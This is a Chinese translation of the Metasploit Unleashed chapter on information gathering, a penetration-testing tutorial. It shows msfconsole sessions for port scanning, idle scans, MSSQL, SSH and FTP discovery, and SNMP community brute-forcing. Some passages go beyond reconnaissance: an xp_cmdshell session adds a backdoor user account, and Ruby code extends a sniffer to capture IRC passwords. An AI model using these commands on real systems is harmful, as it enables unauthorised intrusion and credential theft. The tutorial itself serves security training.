翻译者说明1:本文为Metasploit Unleashed中文版翻译。原文链接:https://www.offensive-security.com/metasploit-unleashed/
翻译者说明2:为减轻翻译负担采用了机器翻译,翻译者从中人工剔除了机翻错误或歧义的问题,但难免会存在小问题,请读者见谅。如发现文章翻译存在问题,可在文章下方评论留言。
翻译者说明3:如果你喜欢这篇翻译,请给关注一下我并给文章点个赞,你的支持是给我工作的最大鼓励。
翻译者说明4:其他章节一并整合在专栏中,如有兴趣可关注专栏了解更多内容。
五、信息收集
任何成功的渗透测试的基础都是坚实的侦察。未能执行适当的信息收集将使您随机摇摆不定,攻击不易受攻击的计算机并错过其他不易受攻击的计算机。
我们将介绍其中一些信息收集技术,例如:
- 端口扫描
- 寻找 MSSQL
- 服务识别
- 密码嗅探
- SNMP 扫描
1. 端口扫描
扫描仪和大多数其他辅助模块使用"RHOSTS"选项而不是"RHOST"。RHOSTS 可以采用 IP 范围 (192.168.1.20-192.168.1.30)、CIDR 范围 (192.168.1.0/24)、逗号分隔的多个范围(192.168.1.0/24、192.168.3.0/24)和行分隔的主机列表文件(file:/tmp/hostlist.txt)。这是可贪婪的Nmap输出文件的另一种用途。
默认情况下,所有扫描程序模块都将"THREADS"值设置为"1"。"THREADS"值设置扫描时要使用的并发线程数。将此值设置为较大的数字以加快扫描速度,或将其保持在较低水平以减少网络流量,但请务必遵守以下准则:
在本机 Win32 系统上将"线程"值保持在 16 以下
在 Cygwin 下运行 MSF 时,将线程数保持在 200 以下
在类Unix操作系统上,THREADS可以设置为256。
1)nmap 和 db_namp
我们可以使用db_nmap
命令来运行地图针对我们的目标和扫描结果将自动存储在我们的数据库中。但是,如果您还希望稍后将扫描结果导入到另一个应用程序或框架中,则可能需要以 XML 格式导出扫描结果。拥有所有三个Nmap输出(xml,grepable和normal)总是很好的。因此,我们可以使用 -oA
标志(后跟所需的文件名)运行 Nmap
扫描,以生成三个输出文件,然后发出 db_import 命令来填充 Metasploit 数据库。
使用通常从命令行使用的选项运行 Nmap。如果我们希望将扫描保存到数据库中,我们将省略输出标志并使用db_nmap
。然后,下面的示例将db_nmap -v -sV 192.168.1.0/24
。
msf > nmap -v -sV 192.168.1.0/24 -oA subnet_1
[*] exec: nmap -v -sV 192.168.1.0/24 -oA subnet_1
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19:29 MDT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 19:29
Scanning 101 hosts [1 port/host]
...
Nmap done: 256 IP addresses (16 hosts up) scanned in 499.41 seconds
Raw packets sent: 19973 (877.822KB) | Rcvd: 15125 (609.512KB)
2)portscan 命令
除了运行Nmap之外,框架中还有各种其他端口扫描仪可供我们使用。
msf > search portscan
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
为了进行比较,我们将端口80的Nmap扫描结果与Metasploit扫描模块进行比较。首先,让我们根据 Nmap 确定哪些主机打开了端口 80。
msf > cat subnet_1.gnmap | grep 80/open | awk '{print $2}'
[*] exec: cat subnet_1.gnmap | grep 80/open | awk '{print $2}'
192.168.1.1
192.168.1.2
192.168.1.10
192.168.1.109
192.168.1.116
192.168.1.150
我们之前运行的Nmap扫描是一个同步扫描,因此,我们将使用 Metasploit 在子网上运行相同的扫描,通过 eth0 接口查找端口 80。
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80
[*] TCP OPEN 192.168.1.2:80
[*] TCP OPEN 192.168.1.10:80
[*] TCP OPEN 192.168.1.109:80
[*] TCP OPEN 192.168.1.116:80
[*] TCP OPEN 192.168.1.150:80
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
在这里,我们将加载"tcp"扫描程序,并将其用于另一个目标。与前面提到的所有插件一样,这使用"RHOSTS"选项。请记住,我们可以发出 hosts -R
命令,以使用数据库中的主机自动设置此选项。
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
RHOSTS => 172.16.194.172
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 172.16.194.172 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 10 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > run
[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN
[*] 172.16.194.172:111 - TCP OPEN
[*] 172.16.194.172:139 - TCP OPEN
[*] 172.16.194.172:445 - TCP OPEN
[*] 172.16.194.172:514 - TCP OPEN
[*] 172.16.194.172:513 - TCP OPEN
[*] 172.16.194.172:512 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
我们可以看到,Metasploit的内置扫描仪模块完全能够为我们找到系统和开放端口。这只是您的武器库中的另一个出色的工具,如果您碰巧在未安装Nmap的系统上运行Metasploit。
3)中小型企业版本扫描
现在我们已经确定了哪些主机在网络上可用,我们可以尝试确定它们正在运行的操作系统。这将有助于我们缩小攻击范围,以针对特定系统,并阻止我们将时间浪费在那些不容易受到特定攻击的系统上。
由于扫描中有许多系统打开了端口 445,因此我们将使用 scanner/smb/version 模块来确定哪个版本的 Windows 正在目标上运行,哪个版本正在运行Samba版本位于 Linux 主机上。
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.200-210
RHOSTS => 192.168.1.200-210
msf auxiliary(smb_version) > set THREADS 11
THREADS => 11
msf auxiliary(smb_version) > run
[*] 192.168.1.209:445 is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:XEN-2K3-FUZZ) (domain:WORKGROUP)
[*] 192.168.1.201:445 is running Windows XP Service Pack 3 (language: English) (name:V-XP-EXPLOIT) (domain:WORKGROUP)
[*] 192.168.1.202:445 is running Windows XP Service Pack 3 (language: English) (name:V-XP-DEBUG) (domain:WORKGROUP)
[*] Scanned 04 of 11 hosts (036% complete)
[*] Scanned 09 of 11 hosts (081% complete)
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
另请注意,如果我们现在发出 hosts
命令,则新获取的信息将存储在 Metasploit 的数据库中。
msf auxiliary(smb_version) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.201 Microsoft Windows XP SP3 client
192.168.1.202 Microsoft Windows XP SP3 client
192.168.1.209 Microsoft Windows 2003 R2 SP2 server
4)空闲扫描
Nmap的IPID空闲扫描允许我们在欺骗网络上另一台主机的IP地址的同时,对目标进行隐蔽扫描。为了使这种类型的扫描工作,我们需要找到一个在网络上处于空闲状态并使用增量或损坏的小端增量的IPID序列的主机。Metasploit包含模块scanner/ ip / ipidseq,用于扫描和查找符合要求的主机。
在免费的在线Nmap书中,您可以找到更多信息Nmap 空闲扫描。
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
THREADS => 50
msf auxiliary(ipidseq) > run
[*] 192.168.1.1's IPID sequence class: All zeros
[*] 192.168.1.2's IPID sequence class: Incremental!
[*] 192.168.1.10's IPID sequence class: Incremental!
[*] 192.168.1.104's IPID sequence class: Randomized
[*] 192.168.1.109's IPID sequence class: Incremental!
[*] 192.168.1.111's IPID sequence class: Incremental!
[*] 192.168.1.114's IPID sequence class: Incremental!
[*] 192.168.1.116's IPID sequence class: All zeros
[*] 192.168.1.124's IPID sequence class: Incremental!
[*] 192.168.1.123's IPID sequence class: Incremental!
[*] 192.168.1.137's IPID sequence class: All zeros
[*] 192.168.1.150's IPID sequence class: All zeros
[*] 192.168.1.151's IPID sequence class: Incremental!
[*] Auxiliary module execution completed
从扫描结果来看,我们有许多潜在的僵尸可以用来执行空闲扫描。我们将尝试在192.168.1.109上使用僵尸扫描主机,看看我们是否得到与之前相同的结果。
msf auxiliary(ipidseq) > nmap -Pn -sI 192.168.1.109 192.168.1.114
[*] exec: nmap -Pn -sI 192.168.1.109 192.168.1.114
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-14 05:51 MDT
Idle scan using zombie 192.168.1.109 (192.168.1.109:80); Class: Incremental
Interesting ports on 192.168.1.114:
Not shown: 996 closed|filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 00:0C:29:41:F2:E8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds
2. 寻找易受攻击的 MSSQL
使用 UDP 脚印可以在内部网络中搜索和定位 MSSQL 安装。当 MSSQL 安装时,它将安装在 TCP 端口 1433 或随机动态 TCP 端口上。如果端口是动态分配的,则查询 UDP 端口 1434 将为我们提供有关服务器的信息,包括服务正在侦听的 TCP 端口。
让我们在 msfconsole 中搜索并加载 MSSQL ping 模块。
msf > search mssql
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator
auxiliary/admin/mssql/mssql_enum_domain_accounts normal Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_sql_logins normal Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
auxiliary/admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS
auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS
auxiliary/admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution
auxiliary/admin/mssql/mssql_findandsampledata normal Microsoft SQL Server Find and Sample Data
auxiliary/admin/mssql/mssql_idf normal Microsoft SQL Server Interesting Data Finder
auxiliary/admin/mssql/mssql_ntlm_stealer normal Microsoft SQL Server NTLM Stealer
auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal Microsoft SQL Server SQLi NTLM Stealer
auxiliary/admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query
auxiliary/admin/mssql/mssql_sql_file normal Microsoft SQL Server Generic Query from File
auxiliary/analyze/jtr_mssql_fast normal John the Ripper MS SQL Password Cracker (Fast Mode)
auxiliary/gather/lansweeper_collector normal Lansweeper Credential Collector
auxiliary/scanner/mssql/mssql_hashdump normal MSSQL Password Hashdump
auxiliary/scanner/mssql/mssql_login normal MSSQL Login Utility
auxiliary/scanner/mssql/mssql_ping normal MSSQL Ping Utility
auxiliary/scanner/mssql/mssql_schemadump normal MSSQL Schema Dump
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
exploit/windows/iis/msadc 1998-07-17 excellent MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
exploit/windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent Lyris ListManager MSDE Weak sa Password
exploit/windows/mssql/ms02_039_slammer 2002-07-24 good MS02-039 Microsoft SQL Server Resolution Overflow
exploit/windows/mssql/ms02_056_hello 2002-08-05 good MS02-056 Microsoft SQL Server Hello Overflow
exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Microsoft SQL Server Clr Stored Procedure Payload Execution
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload 2000-05-30 excellent Microsoft SQL Server Payload Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
post/windows/gather/credentials/mssql_local_hashdump normal Windows Gather Local SQL Server Hash Dump
post/windows/manage/mssql_local_auth_bypass normal Windows Manage Local Microsoft SQL Server Authorization Bypass
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit
[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed
我们发出的第一个命令是搜索任何mssql插件。第二组指令是使用scanner/mssql/mssql_ping
,这将为我们加载扫描仪模块。
接下来,show options
允许我们查看需要指定的内容。set RHOSTS 10.211.55.1/24
设置我们要开始查找 SQL 服务器的子网范围。您可以指定 /16 或您想要执行的任何内容。我们建议增加线程数,因为使用单个线程扫描程序可能需要很长时间。
发出 run
命令后,将执行扫描并拉回有关 MSSQL 服务器的特定信息。正如我们所看到的,机器的名称是"SSHACKTHISBOX-0",TCP端口在1433上运行。
此时,您可以使用 scanner/mssql/mssql_login 模块通过向模块传递字典文件来暴力破解密码。或者,您也可以使用medusa(美杜莎),或者THC-Hydra以执行此操作。成功猜出密码后,有一个整洁的小模块用于执行xp_cmdshell存储过程。
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD
cmd => net user bacon ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit
The command completed successfully.
[*] Auxiliary module execution completed
查看"net user bacon ihazpassword /ADD
"的输出,我们已经成功添加了一个名为"bacon"的用户帐户,从那里我们可以发出net localgroup administrators bacon /ADD
,以便在系统本身上获得本地管理员。此时,我们可以完全控制系统。
3. 服务识别
同样,除了使用Nmap在我们的目标网络上执行服务扫描之外,Metasploit还包括用于各种服务的各种扫描仪,通常可以帮助您确定目标计算机上可能易受攻击的运行服务。
1)固态混合服务
之前的扫描显示,我们在两台计算机上打开了 TCP 端口 22。SSH非常安全,但漏洞并非闻所未闻,从目标收集尽可能多的信息总是值得的。
msf > services -p 22 -c name,port,proto
Services
========
host name port proto
---- ---- ---- -----
172.16.194.163 ssh 22 tcp
172.16.194.172 ssh 22 tcp
我们将加载auxiliary/scanner/ssh/ssh_version,并发出set
命令以设置"RHOSTS"选项。从那里,我们可以通过简单的键入运行来运行模块。
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 172.16.194.163 172.16.194.172
RHOSTS => 172.16.194.163 172.16.194.172
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.194.163 172.16.194.172 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(ssh_version) > run
[*] 172.16.194.163:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
[*] Scanned 1 of 2 hosts (050% complete)
[*] 172.16.194.172:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
2)FTP 服务
配置不当的FTP服务器经常可能是您访问整个网络所需的立足点,因此,每当您遇到通常在TCP端口21上的开放FTP端口时,检查是否允许匿名访问总是是值得的。我们将此处的"线程"设置为"1",因为我们只会扫描1个主机。
msf > services -p 21 -c name,proto
Services
========
host name proto
---- ---- -----
172.16.194.172 ftp tcp
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 172.16.194.172
RHOSTS => 172.16.194.172
msf auxiliary(anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 172.16.194.172 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(anonymous) > run
[*] 172.16.194.172:21 Anonymous READ (220 (vsFTPd 2.3.4))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
在很短的时间内,只需很少的工作,我们就能够获得有关驻留在我们网络上的主机的大量信息,从而可以更好地了解我们在进行渗透测试时所面临的问题。
显然,有太多的扫描仪可供我们展示。然而,很明显,Metasploit框架非常适合您的所有扫描和识别需求。
msf > use auxiliary/scanner/
Display all 485 possibilities? (y or n)
...snip...
4. 密码嗅探
Max Moser发布了一个名为psnuffle的Metasploit密码嗅探模块,该模块将类似于工具dsniff从电线上嗅探密码。它目前支持 POP3、IMAP、FTP 和 HTTP GET。更多信息可在他的博客。
使用 psnuffle 模块非常简单。有一些选项可用,但该模块"开箱即用"地运行良好。
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 1 yes The number of seconds to wait for new data
有一些选项可用,包括导入 pcap 捕获文件的功能。我们将在默认模式下运行 psnuffle 扫描仪。
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> victim / pass (220 3Com 3CDaemon FTP Server Version 2.0)
那里!我们捕获了一次成功的 FTP 登录。这是被动信息收集的绝佳工具。
1)扩展 PSNUFFLE
a)扩展PSNUFFLE以嗅探其他协议
Psnuffle由于其模块化设计而易于扩展。本节将指导开发IRC(互联网中继聊天)协议嗅探器(通知和昵称消息)的过程。
b)模块位置
所有不同的模块都位于data/exploits/psnuffle中。这些名称对应于 psnuffle 内部使用的协议名称。为了开发我们自己的模块,我们以模板的形式查看了现有pop3嗅探器模块的重要部分。
self.sigs = {
:ok => /^(+OK[^n]*)n/si,
:err => /^(-ERR[^n]*)n/si,
:user => /^USERs+([^n]+)n/si,
:pass => /^PASSs+([^n]+)n/si,
:quit => /^(QUITs*[^n]*)n/si }
本节定义在嗅探期间将用于识别相关数据的表达式模式。正则表达式在开始时看起来很奇怪,但非常强大。简而言之,() 中的所有内容稍后都将在脚本中的变量中可用。
c)定义我们自己的 psnuffle 模块
self.sigs = {
:user => /^(NICKs+[^n]+)/si,
:pass => /b(IDENTIFYs+[^n]+)/si,}
对于IRC,这一部分将类似于上面的部分。并非所有昵称服务器都使用IDENTITY来发送密码,但Freenode上的密码确实如此。
d)会话定义
对于每个模块,我们首先必须定义它应该处理哪些端口以及如何跟踪会话。
return if not pkt[:tcp] # We don't want to handle anything other than tcp
return if (pkt[:tcp].src_port != 6667 and pkt[:tcp].dst_port != 6667) # Process only packet on port 6667
#Ensure that the session hash stays the same for both way of communication
if (pkt[:tcp].dst_port == 6667) # When packet is sent to server
s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}")
else # When packet is coming from the server
s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}")
end
现在,我们有了一个唯一合并信息的会话对象,我们可以继续处理与我们之前定义的正则表达式之一匹配的数据包内容。
case matched
when :user # when the pattern "/^(NICKs+[^n]+)/si" is matching the packet content
s[:user]=matches #Store the name into the session hash s for later use
# Do whatever you like here... maybe a puts if you need to
when :pass # When the pattern "/b(IDENTIFYs+[^n]+)/si" is matching
s[:pass]=matches # Store the password into the session hash s as well
if (s[:user] and s[:pass]) # When we have the name and the pass sniffed, print it
print "-> IRC login sniffed: #{s[:session]} >> username:#{s[:user]} password:#{s[:pass]}n"
end
sessions.delete(s[:session]) # Remove this session because we dont need to track it anymore
when nil
# No matches, don't do anything else # Just in case anything else is matching...
sessions[s[:session]].merge!({k => matches}) # Just add it to the session object
end
5. SNMP 扫描
1)用于 METASPLOIT 的 SNMP 辅助模块
继续我们的信息收集,让我们来看看SNMP扫描。SNMP 扫描通常擅长查找有关特定系统的大量信息或实际损害远程设备。例如,如果您可以找到运行私有字符串的Cisco设备,则实际上可以下载整个设备配置,对其进行修改,然后上传您自己的恶意配置。通常,密码本身是7级编码的,这意味着它们对于解码和获取特定设备的启用或登录密码非常重要。
Metasploit带有一个内置的辅助模块,专门用于扫描SNMP设备。在执行 SNMP 扫描之前,有几件事需要了解。首先,"只读"和"读写"社区字符串在可以在设备本身上提取或修改哪些类型的信息中起着重要作用。如果您可以"猜测"只读或读写字符串,则可以获得通常不具备的相当多的访问权限。此外,如果基于 Windows 的设备配置了 SNMP(通常配置有 RO/RW 社区字符串),则可以提取修补程序级别、正在运行的服务、上次重新启动时间、系统上的用户名、路由以及对攻击者有用的各种其他信息量。
注意:默认情况下,Metasploitable 的 SNMP 服务仅侦听本地主机。此处演示的许多示例将要求您更改这些默认设置。打开并编辑 /etc/default/snmpd,然后从以下位置更改以下内容:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
至
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'
需要重新启动服务才能使更改生效。重新启动后,您现在可以从攻击计算机扫描该服务。
2)什么是 MIB?
通过 SNMP 进行查询时,有一个所谓的 MIB API。MIB 代表管理信息库.此接口允许您查询设备并提取信息。Metasploit加载了其数据库中的默认MIB列表,它使用它们来查询设备以获取更多信息,具体取决于获得的访问级别。让我们看一下辅助模块。
msf > search snmp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/misc/oki_scanner normal OKI Printer Default Login Credential Scanner
auxiliary/scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module
auxiliary/scanner/snmp/cisco_config_tftp normal Cisco IOS SNMP Configuration Grabber (TFTP)
auxiliary/scanner/snmp/cisco_upload_file normal Cisco IOS SNMP File Upload (TFTP)
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/snmp/snmp_enumshares normal SNMP Windows SMB Share Enumeration
auxiliary/scanner/snmp/snmp_enumusers normal SNMP Windows Username Enumeration
auxiliary/scanner/snmp/snmp_login normal SNMP Community Scanner
auxiliary/scanner/snmp/snmp_set normal SNMP Set Module
auxiliary/scanner/snmp/xerox_workcentre_enumusers normal Xerox WorkCentre User Enumeration (SNMP)
exploit/windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Oracle 9i XDB FTP UNLOCK Overflow (win32)
exploit/windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
exploit/windows/http/hp_nnm_snmp 2009-12-09 great HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
exploit/windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
post/windows/gather/enum_snmp normal Windows Gather SNMP Settings Enumeration (Registry)
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The password to test
PASS_FILE /usr/share/wordlists/fasttrack.txt no File containing communities, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USER_AS_PASS false no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts
VERSION 1 yes The SNMP version to scan (Accepted: 1, 2c, all)
msf auxiliary(snmp_login) > set RHOSTS 192.168.0.0-192.168.5.255
rhosts => 192.168.0.0-192.168.5.255
msf auxiliary(snmp_login) > set THREADS 10
threads => 10
msf auxiliary(snmp_login) > run
[*] >> progress (192.168.0.0-192.168.0.255) 0/30208...
[*] >> progress (192.168.1.0-192.168.1.255) 0/30208...
[*] >> progress (192.168.2.0-192.168.2.255) 0/30208...
[*] >> progress (192.168.3.0-192.168.3.255) 0/30208...
[*] >> progress (192.168.4.0-192.168.4.255) 0/30208...
[*] >> progress (-) 0/0...
